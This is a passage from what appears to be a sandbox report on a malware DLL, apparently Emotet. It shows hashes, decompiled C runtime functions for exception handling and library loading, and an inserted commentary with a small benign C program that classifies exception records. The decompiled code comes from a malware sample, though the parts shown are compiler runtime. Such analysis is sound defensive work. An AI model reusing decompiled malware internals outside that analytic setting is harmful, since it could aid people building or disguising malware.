                                                                                            • Instruction Fuzzy Hash: B8D1DD76608F888AD765CB29E45439EB7A0F7C9BD0F508116EACE83768DF78C545CB01
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: PaintProcWindow$BeginMessagePostQuit
                                                                                            • String ID: i
                                                                                            • API String ID: 3181456275-3865851505
                                                                                            • Opcode ID: fcb843795d6400421a4bb60a8f9f2442e166c0b7f90a62d720e089610d409317
                                                                                            • Instruction ID: 3856721ac4770c8f636c1cd384f04675dc9eeb63fc6bf43fe2054305ebc0c00e
                                                                                            • Opcode Fuzzy Hash: fcb843795d6400421a4bb60a8f9f2442e166c0b7f90a62d720e089610d409317
                                                                                            • Instruction Fuzzy Hash: FA51ED32518AC8C6E7B2DB55E4543DEB360F788784F609516F6CA52A98CFBCC548DF40
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: Object$LineMoveSelect$CreateDeletePolyline
                                                                                            • String ID:
                                                                                            • API String ID: 1917832262-0
                                                                                            • Opcode ID: 6075ceb34f4407423de1dccbff4bd8bdfe60344340a25c122dca44a040083570
                                                                                            • Instruction ID: 377a05cc6cc4517dbb54ffd3f6057de865f15df1cc6264ad20f86e3ae03f80f6
                                                                                            • Opcode Fuzzy Hash: 6075ceb34f4407423de1dccbff4bd8bdfe60344340a25c122dca44a040083570
                                                                                            • Instruction Fuzzy Hash: CDB12276604B848AD766CB38E05135AF7A5F7C9784F108216EACE53B69DF3CD5498F00
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%
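The decompiled function E00000001180003328 that follows tests the record passed in __rcx for ExceptionCode 0xe06d7363, NumberParameters == 4 at +0x18, a magic number in 0x19930520..0x19930522 at +0x20, and a NULL ThrowInfo pointer at +0x30 (the bare `throw;` rethrow case); the later `(*_t280 & 0x1fffffff) - 0x19930521` test is the matching FuncInfo magic-number check. These are the MSVC C++ runtime's exception-handling constants, so this routine is the statically linked CRT frame handler, not Emotet-specific logic, and is not worth triage time. The C below is an added example, not code from the report, from Joe Sandbox or from the sample: it mirrors the Win64 EXCEPTION_RECORD layout (field offsets assumed from the public structure), applies the same four checks, and classifies constructed records. The names classify_exception_record and make_record are the example's own.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* MSVC C++ runtime exception constants (ehdata.h). These are the literals the
 * decompiled handler compares against at +0x0, +0x18, +0x20 and +0x30. */
#define EH_EXCEPTION_NUMBER     0xE06D7363u  /* ('msc' | 0xE0000000): a C++ throw */
#define EH_EXCEPTION_PARAMETERS 4u           /* x64 record: magic, object, ThrowInfo, image base */
#define EH_MAGIC_NUMBER1        0x19930520u  /* oldest ThrowInfo layout the CRT accepts */
#define EH_MAGIC_NUMBER3        0x19930522u  /* newest accepted layout */

/* Same field order and sizes as the Win64 EXCEPTION_RECORD (layout assumed). */
typedef struct exception_record {
    uint32_t                 ExceptionCode;
    uint32_t                 ExceptionFlags;
    struct exception_record *ExceptionRecord;
    void                    *ExceptionAddress;
    uint32_t                 NumberParameters;
    uintptr_t                ExceptionInformation[15];
} exception_record_t;

#if UINTPTR_MAX == 0xFFFFFFFFFFFFFFFFu
/* The offsets printed by the decompiler only hold for the 64-bit layout. */
_Static_assert(offsetof(exception_record_t, NumberParameters)     == 0x18, "layout");
_Static_assert(offsetof(exception_record_t, ExceptionInformation) == 0x20, "layout");
#endif

enum record_kind {
    RECORD_NOT_CXX = 0,  /* SEH / hardware fault, not a C++ throw: the handler skips it */
    RECORD_CXX_THROW,    /* C++ throw with ThrowInfo: normal catch matching */
    RECORD_CXX_RETHROW   /* bare `throw;`: ThrowInfo is NULL, handler reuses the active exception */
};

/* The four tests the decompiled frame handler applies to the incoming record. */
enum record_kind classify_exception_record(const exception_record_t *rec)
{
    if (rec->ExceptionCode != EH_EXCEPTION_NUMBER)        return RECORD_NOT_CXX;
    if (rec->NumberParameters != EH_EXCEPTION_PARAMETERS) return RECORD_NOT_CXX;
    /* One unsigned subtract covers magic numbers 1..3, which is how the
     * decompiled `x - 0x19930520 - 2 > 0` range test reads. */
    uint32_t magic = (uint32_t)rec->ExceptionInformation[0];
    if (magic - EH_MAGIC_NUMBER1 > EH_MAGIC_NUMBER3 - EH_MAGIC_NUMBER1) return RECORD_NOT_CXX;
    if (rec->ExceptionInformation[2] == 0)                return RECORD_CXX_RETHROW;
    return RECORD_CXX_THROW;
}

/* Builds a record from the four values the checks depend on (constructed input). */
exception_record_t make_record(uint32_t code, uint32_t nparams,
                               uintptr_t magic, uintptr_t throw_info)
{
    exception_record_t rec;
    memset(&rec, 0, sizeof rec);
    rec.ExceptionCode = code;
    rec.NumberParameters = nparams;
    rec.ExceptionInformation[0] = magic;
    rec.ExceptionInformation[1] = (uintptr_t)0x1000;  /* stand-in exception object pointer */
    rec.ExceptionInformation[2] = throw_info;
    return rec;
}

int main(void)
{
    /* Constructed sample records, not captured from the analysed process. */
    struct { const char *name; exception_record_t rec; } samples[] = {
        { "C++ throw",        make_record(EH_EXCEPTION_NUMBER, 4, EH_MAGIC_NUMBER1, (uintptr_t)0x2000) },
        { "C++ rethrow",      make_record(EH_EXCEPTION_NUMBER, 4, EH_MAGIC_NUMBER3, 0) },
        { "access violation", make_record(0xC0000005u, 2, 0, 0) },
        { "wrong magic",      make_record(EH_EXCEPTION_NUMBER, 4, 0x19930523u, (uintptr_t)0x2000) },
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-17s -> %d\n", samples[i].name, classify_exception_record(&samples[i].rec));
    return 0;
}
```

When a decompiled routine in a sandbox report compares against 0xe06d7363 and 0x1993052x, treat it as compiler runtime and move on to functions whose API IDs or strings point at the payload.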

                                                                                            C-Code - Quality: 66%
                                                                                            			E00000001180003328(intOrPtr __ecx, void* __edx, void* __esi, intOrPtr* __rcx, long long __rdx, long long __r8, long long __r9, void* __r10) {
                                                                                            				void* __rbx;
                                                                                            				void* __rdi;
                                                                                            				void* __rsi;
                                                                                            				void* __rbp;
                                                                                            				signed int* _t128;
                                                                                            				void* _t145;
                                                                                            				intOrPtr _t146;
                                                                                            				intOrPtr _t154;
                                                                                            				void* _t173;
                                                                                            				intOrPtr _t176;
                                                                                            				signed int _t177;
                                                                                            				signed int _t178;
                                                                                            				void* _t209;
                                                                                            				signed long long _t219;
                                                                                            				signed long long _t220;
                                                                                            				signed long long _t226;
                                                                                            				long long _t228;
                                                                                            				signed int _t235;
                                                                                            				intOrPtr* _t236;
                                                                                            				intOrPtr* _t237;
                                                                                            				signed long long _t246;
                                                                                            				long long _t267;
                                                                                            				signed int* _t280;
                                                                                            				long long _t281;
                                                                                            				void* _t282;
                                                                                            				void* _t283;
                                                                                            				signed long long _t284;
                                                                                            				long long _t296;
                                                                                            				signed int _t307;
                                                                                            				unsigned long long _t313;
                                                                                            
                                                                                            				_t180 = __esi;
                                                                                            				_t282 = _t283 - 0x28;
                                                                                            				_t284 = _t283 - 0x128;
                                                                                            				_t219 =  *0x80021010; // 0x5e1a320b5ccd
                                                                                            				_t220 = _t219 ^ _t284;
                                                                                            				 *(_t282 + 0x10) = _t220;
                                                                                            				_t280 =  *((intOrPtr*)(_t282 + 0x90));
                                                                                            				_t307 =  *((intOrPtr*)(_t282 + 0xa8));
                                                                                            				 *((long long*)(_t284 + 0x68)) = __r8;
                                                                                            				_t236 = __rcx;
                                                                                            				 *((long long*)(_t284 + 0x78)) = __rdx;
                                                                                            				 *(_t282 - 0x68) = _t307;
                                                                                            				 *((char*)(_t284 + 0x60)) = 0;
                                                                                            				_t281 = __r9;
                                                                                            				_t128 = E0000000118000427C(__ecx, __esi, __rcx, __rdx, __r9, __r9, _t282, _t280, __r9);
                                                                                            				r14d = _t128;
                                                                                            				if (_t128 - 0xffffffff < 0) goto 0x800037f7;
                                                                                            				if (_t128 - _t280[1] >= 0) goto 0x800037f7;
                                                                                            				if ( *_t236 != 0xe06d7363) goto 0x80003474;
                                                                                            				if ( *((intOrPtr*)(_t236 + 0x18)) != 4) goto 0x80003474;
                                                                                            				if ( *((intOrPtr*)(_t236 + 0x20)) - 0x19930520 - 2 > 0) goto 0x80003474;
                                                                                            				if ( *((long long*)(_t236 + 0x30)) != 0) goto 0x80003474;
                                                                                            				E00000001180002D40(_t220);
                                                                                            				if ( *((long long*)(_t220 + 0x20)) == 0) goto 0x80003790;
                                                                                            				E00000001180002D40(_t220);
                                                                                            				_t237 =  *((intOrPtr*)(_t220 + 0x20));
                                                                                            				E00000001180002D40(_t220);
                                                                                            				 *((char*)(_t284 + 0x60)) = 1;
                                                                                            				 *((long long*)(_t284 + 0x68)) =  *((intOrPtr*)(_t220 + 0x28));
                                                                                            				E00000001180002448(_t220,  *((intOrPtr*)(_t237 + 0x38)));
                                                                                            				if ( *_t237 != 0xe06d7363) goto 0x8000342c;
                                                                                            				if ( *((intOrPtr*)(_t237 + 0x18)) != 4) goto 0x8000342c;
                                                                                            				if ( *((intOrPtr*)(_t237 + 0x20)) - 0x19930520 - 2 > 0) goto 0x8000342c;
                                                                                            				if ( *((long long*)(_t237 + 0x30)) == 0) goto 0x800037f7;
                                                                                            				E00000001180002D40(_t220);
                                                                                            				if ( *(_t220 + 0x38) == 0) goto 0x80003474;
                                                                                            				E00000001180002D40(_t220);
                                                                                            				E00000001180002D40(_t220);
                                                                                            				 *(_t220 + 0x38) =  *(_t220 + 0x38) & 0x00000000;
                                                                                            				if (E00000001180004314(_t220, _t237, _t237,  *(_t220 + 0x38), __r9) != 0) goto 0x8000346f;
                                                                                            				if (E00000001180004404(_t220, _t237,  *(_t220 + 0x38), __r9, _t282) == 0) goto 0x800037d4;
                                                                                            				goto 0x800037b0;
                                                                                            				 *((long long*)(_t282 - 0x40)) =  *((intOrPtr*)(__r9 + 8));
                                                                                            				 *(_t282 - 0x48) = _t280;
                                                                                            				if ( *_t237 != 0xe06d7363) goto 0x80003747;
                                                                                            				if ( *((intOrPtr*)(_t237 + 0x18)) != 4) goto 0x80003747;
                                                                                            				if ( *((intOrPtr*)(_t237 + 0x20)) - 0x19930520 - 2 > 0) goto 0x80003747;
                                                                                            				r15d = 0;
                                                                                            				if (_t280[3] - r15d <= 0) goto 0x80003678;
                                                                                            				 *(_t284 + 0x28) =  *(_t282 + 0xa0);
                                                                                            				 *(_t284 + 0x20) = _t280;
                                                                                            				r8d = r14d;
                                                                                            				_t145 = E00000001180002134(_t237, _t282 - 0x28, _t282 - 0x48, __r9, _t282, _t280, __r9, __r10);
                                                                                            				asm("movups xmm0, [ebp-0x28]");
                                                                                            				asm("movdqu [ebp-0x38], xmm0");
                                                                                            				asm("psrldq xmm0, 0x8");
                                                                                            				asm("movd eax, xmm0");
                                                                                            				if (_t145 -  *((intOrPtr*)(_t282 - 0x10)) >= 0) goto 0x80003678;
                                                                                            				_t296 =  *((intOrPtr*)(_t282 - 0x28));
                                                                                            				r13d =  *((intOrPtr*)(_t282 - 0x30));
                                                                                            				 *((long long*)(_t282 - 0x80)) = _t296;
                                                                                            				_t146 = r13d;
                                                                                            				asm("inc ecx");
                                                                                            				 *((intOrPtr*)(_t282 - 0x50)) = __ecx;
                                                                                            				asm("movd eax, xmm0");
                                                                                            				asm("movups [ebp-0x60], xmm0");
                                                                                            				if (_t146 - r14d > 0) goto 0x8000366b;
                                                                                            				_t226 =  *(_t282 - 0x60) >> 0x20;
                                                                                            				if (r14d - _t146 > 0) goto 0x8000366b;
                                                                                            				r12d = r15d;
                                                                                            				_t267 =  *((intOrPtr*)( *((intOrPtr*)( *( *(_t282 - 0x38)) + 0x10)) + ( *( *(_t282 - 0x38)) +  *( *(_t282 - 0x38)) * 4) * 4 +  *((intOrPtr*)(_t296 + 8)) + 0x10)) +  *((intOrPtr*)(__r9 + 8));
                                                                                            				_t313 =  *(_t282 - 0x58) >> 0x20;
                                                                                            				 *((long long*)(_t282 - 0x70)) = _t267;
                                                                                            				if (r15d == 0) goto 0x80003658;
                                                                                            				_t246 = _t226 + _t226 * 4;
                                                                                            				asm("movups xmm0, [edx+ecx*4]");
                                                                                            				asm("movups [ebp-0x8], xmm0");
                                                                                            				_t59 = _t246 * 4; // 0x48ccccc35f40c483
                                                                                            				 *((intOrPtr*)(_t282 + 8)) =  *((intOrPtr*)(_t267 + _t59 + 0x10));
                                                                                            				E0000000118000241C(_t226);
                                                                                            				_t228 = _t226 + 4 +  *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x30)) + 0xc));
                                                                                            				 *((long long*)(_t284 + 0x70)) = _t228;
                                                                                            				E0000000118000241C(_t228);
                                                                                            				_t176 =  *((intOrPtr*)(_t228 +  *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x30)) + 0xc))));
                                                                                            				 *((intOrPtr*)(_t284 + 0x64)) = _t176;
                                                                                            				if (_t176 <= 0) goto 0x800035e8;
                                                                                            				E0000000118000241C(_t228);
                                                                                            				 *((long long*)(_t282 - 0x78)) = _t228 +  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x70))));
                                                                                            				if (E00000001180003A1C(_t180, _t237, _t282 - 8, _t228 +  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x70)))), _t280, __r9,  *((intOrPtr*)(_t237 + 0x30))) != 0) goto 0x800035f9;
                                                                                            				 *((long long*)(_t284 + 0x70)) =  *((long long*)(_t284 + 0x70)) + 4;
                                                                                            				_t154 =  *((intOrPtr*)(_t284 + 0x64)) - 1;
                                                                                            				 *((intOrPtr*)(_t284 + 0x64)) = _t154;
                                                                                            				if (_t154 > 0) goto 0x800035ac;
                                                                                            				r12d = r12d + 1;
                                                                                            				if (r12d == r15d) goto 0x8000365f;
                                                                                            				goto 0x80003565;
                                                                                            				 *((char*)(_t284 + 0x58)) =  *((intOrPtr*)(_t282 + 0x98));
                                                                                            				 *(_t284 + 0x50) =  *((intOrPtr*)(_t284 + 0x60));
                                                                                            				 *((long long*)(_t284 + 0x48)) =  *(_t282 - 0x68);
                                                                                            				 *(_t284 + 0x40) =  *(_t282 + 0xa0);
                                                                                            				 *(_t284 + 0x38) = _t282 - 0x60;
                                                                                            				 *(_t284 + 0x30) =  *((intOrPtr*)(_t282 - 0x78));
                                                                                            				 *(_t284 + 0x28) = _t282 - 8;
                                                                                            				 *(_t284 + 0x20) = _t280;
                                                                                            				E00000001180003254(_t180, _t237, _t237,  *((intOrPtr*)(_t284 + 0x78)),  *((intOrPtr*)(_t284 + 0x68)), _t281);
                                                                                            				goto 0x80003664;
                                                                                            				goto 0x80003668;
                                                                                            				r15d = 0;
                                                                                            				r13d = r13d + 1;
                                                                                            				if (r13d -  *((intOrPtr*)(_t282 - 0x10)) < 0) goto 0x800034fd;
                                                                                            				if (( *_t280 & 0x1fffffff) - 0x19930521 < 0) goto 0x80003784;
                                                                                            				_t209 = _t280[8] - r15d;
                                                                                            				if (_t209 == 0) goto 0x8000369e;
                                                                                            				E00000001180002408(_t282 - 8);
                                                                                            				if (_t209 != 0) goto 0x800036bf;
                                                                                            				if ((_t280[9] >> 0x00000002 & 0x00000001) == 0) goto 0x80003784;
                                                                                            				if (E00000001180001FD8(_t280[9] >> 0x00000002 & 0x00000001, _t282 - 8 + _t280[8], _t281, _t280) != 0) goto 0x80003784;
                                                                                            				if ((_t280[9] >> 0x00000002 & 0x00000001) != 0) goto 0x800037da;
                                                                                            				if (_t280[8] == r15d) goto 0x800036e4;
                                                                                            				E00000001180002408(_t282 - 8 + _t280[8]);
                                                                                            				_t235 = _t280[8];
                                                                                            				goto 0x800036e7;
                                                                                            				if (E00000001180004314(_t235, _t237, _t237, _t313, _t281) != 0) goto 0x80003784;
                                                                                            				E00000001180002068(_t237,  *((intOrPtr*)(_t284 + 0x78)), _t281, _t282, _t280, _t282 - 0x78);
                                                                                            				_t177 =  *((intOrPtr*)(_t282 + 0x98));
                                                                                            				 *(_t284 + 0x50) = _t177;
                                                                                            				_t178 = _t177 | 0xffffffff;
                                                                                            				 *((long long*)(_t284 + 0x48)) = _t281;
                                                                                            				 *(_t284 + 0x40) = _t313;
                                                                                            				 *(_t284 + 0x38) = _t178;
                                                                                            				 *(_t284 + 0x30) = _t178;
                                                                                            				 *(_t284 + 0x28) = _t280;
                                                                                            				 *(_t284 + 0x20) = _t313;
                                                                                            				E00000001180002274( *((intOrPtr*)(_t284 + 0x78)), _t237,  *((intOrPtr*)(_t284 + 0x68)), _t235);
                                                                                            				goto 0x80003784;
                                                                                            				if (_t280[3] <= 0) goto 0x80003784;
                                                                                            				if ( *((char*)(_t282 + 0x98)) != 0) goto 0x800037f7;
                                                                                            				 *(_t284 + 0x38) = _t307;
                                                                                            				 *(_t284 + 0x30) =  *(_t282 + 0xa0);
                                                                                            				 *(_t284 + 0x28) = r14d;
                                                                                            				 *(_t284 + 0x20) = _t280;
                                                                                            				E00000001180003800(_t237, _t237,  *((intOrPtr*)(_t284 + 0x78)), _t313, _t281);
                                                                                            				_t173 = E00000001180002D40(_t235);
                                                                                            				if ( *((long long*)(_t235 + 0x38)) != 0) goto 0x800037f7;
                                                                                            				return E000000011800010B0(_t173, _t178,  *(_t282 + 0x10) ^ _t284);
                                                                                            			}
                                                                                            0x180003328
                                                                                            0x180003335
                                                                                            0x18000333a
                                                                                            0x180003341
                                                                                            0x180003348
                                                                                            0x18000334b
                                                                                            0x18000334f
                                                                                            0x180003359
                                                                                            0x180003363
                                                                                            0x180003368
                                                                                            0x18000336b
                                                                                            0x180003376
                                                                                            0x18000337d
                                                                                            0x180003382
                                                                                            0x180003385
                                                                                            0x18000338a
                                                                                            0x180003390
                                                                                            0x180003399
                                                                                            0x1800033a5
                                                                                            0x1800033af
                                                                                            0x1800033c0
                                                                                            0x1800033cb
                                                                                            0x1800033d1
                                                                                            0x1800033db
                                                                                            0x1800033e1
                                                                                            0x1800033e6
                                                                                            0x1800033ea
                                                                                            0x1800033f3
                                                                                            0x1800033fc
                                                                                            0x180003401
                                                                                            0x18000340c
                                                                                            0x180003412
                                                                                            0x18000341f
                                                                                            0x180003426
                                                                                            0x18000342c
                                                                                            0x180003436
                                                                                            0x180003438
                                                                                            0x180003441
                                                                                            0x18000344c
                                                                                            0x180003458
                                                                                            0x180003464
                                                                                            0x18000346a
                                                                                            0x180003478
                                                                                            0x18000347c
                                                                                            0x180003486
                                                                                            0x180003490
                                                                                            0x1800034a1
                                                                                            0x1800034a7
                                                                                            0x1800034ae
                                                                                            0x1800034be
                                                                                            0x1800034c9
                                                                                            0x1800034ce
                                                                                            0x1800034d1
                                                                                            0x1800034d6
                                                                                            0x1800034da
                                                                                            0x1800034df
                                                                                            0x1800034e4
                                                                                            0x1800034eb
                                                                                            0x1800034f1
                                                                                            0x1800034f5
                                                                                            0x1800034f9
                                                                                            0x180003508
                                                                                            0x180003517
                                                                                            0x180003521
                                                                                            0x180003524
                                                                                            0x180003528
                                                                                            0x18000352f
                                                                                            0x180003539
                                                                                            0x180003540
                                                                                            0x180003546
                                                                                            0x18000354c
                                                                                            0x180003554
                                                                                            0x180003558
                                                                                            0x18000355f
                                                                                            0x180003568
                                                                                            0x18000356c
                                                                                            0x180003570
                                                                                            0x180003574
                                                                                            0x180003578
                                                                                            0x18000357b
                                                                                            0x18000358c
                                                                                            0x18000358f
                                                                                            0x180003594
                                                                                            0x1800035a1
                                                                                            0x1800035a4
                                                                                            0x1800035aa
                                                                                            0x1800035ac
                                                                                            0x1800035c7
                                                                                            0x1800035d2
                                                                                            0x1800035d8
                                                                                            0x1800035de
                                                                                            0x1800035e0
                                                                                            0x1800035e6
                                                                                            0x1800035e8
                                                                                            0x1800035ee
                                                                                            0x1800035f4
                                                                                            0x180003612
                                                                                            0x18000361a
                                                                                            0x180003622
                                                                                            0x18000362d
                                                                                            0x180003635
                                                                                            0x18000363e
                                                                                            0x180003647
                                                                                            0x18000364c
                                                                                            0x180003651
                                                                                            0x180003656
                                                                                            0x18000365d
                                                                                            0x180003668
                                                                                            0x18000366b
                                                                                            0x180003672
                                                                                            0x180003684
                                                                                            0x18000368a
                                                                                            0x18000368e
                                                                                            0x180003690
                                                                                            0x18000369c
                                                                                            0x1800036a6
                                                                                            0x1800036b9
                                                                                            0x1800036c7
                                                                                            0x1800036d1
                                                                                            0x1800036d3
                                                                                            0x1800036db
                                                                                            0x1800036e2
                                                                                            0x1800036f1
                                                                                            0x180003704
                                                                                            0x180003709
                                                                                            0x18000371a
                                                                                            0x18000371e
                                                                                            0x180003721
                                                                                            0x180003726
                                                                                            0x18000372b
                                                                                            0x18000372f
                                                                                            0x180003736
                                                                                            0x18000373b
                                                                                            0x180003740
                                                                                            0x180003745
                                                                                            0x18000374b
                                                                                            0x180003754
                                                                                            0x180003763
                                                                                            0x18000376b
                                                                                            0x180003772
                                                                                            0x18000377a
                                                                                            0x18000377f
                                                                                            0x180003784
                                                                                            0x18000378e
                                                                                            0x1800037af

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                            • String ID: csm$csm$csm
                                                                                            • API String ID: 849930591-393685449
                                                                                            • Opcode ID: b6b7f02adf660401896063c6a860fb7c8eea0d446ae07e01c980b744b2235902
                                                                                            • Instruction ID: 68369fba8b053f101f7a0a57f2a328d7db6ec17b1fffbc4fe0a5b608d0144455
                                                                                            • Opcode Fuzzy Hash: b6b7f02adf660401896063c6a860fb7c8eea0d446ae07e01c980b744b2235902
                                                                                            • Instruction Fuzzy Hash: C0E1B272604B888AEBA6DF66D4423DD77A4F749BC8F008116FE8957B96CF34D698C700
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 77%
                                                                                            			E0000000118000A3DC(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
                                                                                            				void* _t35;
                                                                                            				signed long long _t56;
                                                                                            				intOrPtr _t60;
                                                                                            				void* _t71;
                                                                                            				signed long long _t72;
                                                                                            				long long _t78;
                                                                                            				void* _t82;
                                                                                            				signed long long _t88;
                                                                                            				signed long long _t89;
                                                                                            				signed long long _t90;
                                                                                            				WCHAR* _t91;
                                                                                            				long _t94;
                                                                                            				void* _t97;
                                                                                            				WCHAR* _t102;
                                                                                            
                                                                                            				 *((long long*)(_t82 + 8)) = __rbx;
                                                                                            				 *((long long*)(_t82 + 0x10)) = _t78;
                                                                                            				 *((long long*)(_t82 + 0x18)) = __rsi;
                                                                                            				r15d = __ecx;
                                                                                            				_t72 = _t71 | 0xffffffff;
                                                                                            				_t89 =  *0x80021010; // 0x5e1a320b5ccd
                                                                                            				_t88 =  *(0x180000000 + 0x226f0 + _t102 * 8) ^ _t89;
                                                                                            				asm("dec ecx");
                                                                                            				if (_t88 == _t72) goto 0x8000a51f;
                                                                                            				if (_t88 == 0) goto 0x8000a441;
                                                                                            				_t56 = _t88;
                                                                                            				goto 0x8000a521;
                                                                                            				if (__r8 == __r9) goto 0x8000a504;
                                                                                            				_t60 =  *((intOrPtr*)(0x180000000 + 0x22640 + __rsi * 8));
                                                                                            				if (_t60 == 0) goto 0x8000a469;
                                                                                            				if (_t60 != _t72) goto 0x8000a55e;
                                                                                            				goto 0x8000a4f0;
                                                                                            				r8d = 0x800;
                                                                                            				LoadLibraryExW(_t102, _t97, _t94);
                                                                                            				if (_t56 != 0) goto 0x8000a53e;
                                                                                            				if (GetLastError() != 0x57) goto 0x8000a4de;
                                                                                            				_t14 = _t56 - 0x50; // -80
                                                                                            				_t35 = _t14;
                                                                                            				r8d = _t35;
                                                                                            				if (E00000001180007070(__r8) == 0) goto 0x8000a4de;
                                                                                            				r8d = _t35;
                                                                                            				if (E00000001180007070(__r8) == 0) goto 0x8000a4de;
                                                                                            				r8d = 0;
                                                                                            				LoadLibraryExW(_t91, _t71);
                                                                                            				if (_t56 != 0) goto 0x8000a53e;
                                                                                            				 *((intOrPtr*)(0x180000000 + 0x22640 + __rsi * 8)) = _t72;
                                                                                            				if (__r8 + 4 != __r9) goto 0x8000a44a;
                                                                                            				_t90 =  *0x80021010; // 0x5e1a320b5ccd
                                                                                            				asm("dec eax");
                                                                                            				 *(0x180000000 + 0x226f0 + _t102 * 8) = _t72 ^ _t90;
                                                                                            				return 0;
                                                                                            			}
                                                                                            0x18000a3dc
                                                                                            0x18000a3e1
                                                                                            0x18000a3e6
                                                                                            0x18000a3f8
                                                                                            0x18000a402
                                                                                            0x18000a418
                                                                                            0x18000a41f
                                                                                            0x18000a428
                                                                                            0x18000a42e
                                                                                            0x18000a437
                                                                                            0x18000a439
                                                                                            0x18000a43c
                                                                                            Instruction addresses (one per decompiled statement, collapsed from the report's address column): 0x18000a444, 0x18000a44d, 0x18000a459, 0x18000a45e, 0x18000a464, 0x18000a476, 0x18000a47c, 0x18000a488, 0x18000a497, 0x18000a499, 0x18000a499, 0x18000a49f, 0x18000a4b0, 0x18000a4b2, 0x18000a4c6, 0x18000a4c8, 0x18000a4d0, 0x18000a4dc, 0x18000a4e8, 0x18000a4f7, 0x18000a4fd, 0x18000a511, 0x18000a517, 0x18000a53d

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressFreeLibraryProc
                                                                                            • String ID: api-ms-$ext-ms-
                                                                                            • API String ID: 3013587201-537541572
                                                                                            • Opcode ID: 4973cf4a17c5a6c0ea837db478b6f4f53bca8011a61d94df8f11c1c7fa6ad517
                                                                                            • Instruction ID: 4cb29e05f73c92bcfdeebd25cdbb701ff5eb44b215489781f60aaecc25d2491e
                                                                                            • Opcode Fuzzy Hash: 4973cf4a17c5a6c0ea837db478b6f4f53bca8011a61d94df8f11c1c7fa6ad517
                                                                                            • Instruction Fuzzy Hash: ED41D032715A0856FBA7CB16AC047D53391B78EBE0F09C225BD1D47798EE38C64D8300
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 50%
                                                                                            			E000000011800045BC(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
                                                                                            				intOrPtr _t61;
                                                                                            				intOrPtr _t65;
                                                                                            				intOrPtr _t67;
                                                                                            				intOrPtr _t68;
                                                                                            				struct HINSTANCE__* _t81;
                                                                                            				long long _t85;
                                                                                            				void* _t89;
                                                                                            				struct HINSTANCE__* _t94;
                                                                                            				long _t97;
                                                                                            				void* _t100;
                                                                                            				signed long long _t101;
                                                                                            				WCHAR* _t104;
                                                                                            
                                                                                            				 *((long long*)(_t89 + 8)) = __rbx;
                                                                                            				 *((long long*)(_t89 + 0x10)) = _t85;
                                                                                            				 *((long long*)(_t89 + 0x18)) = __rsi;
                                                                                            				_t101 = _t100 | 0xffffffff;
                                                                                            				_t61 =  *((intOrPtr*)(0x180000000 + 0x22208 + _t81 * 8));
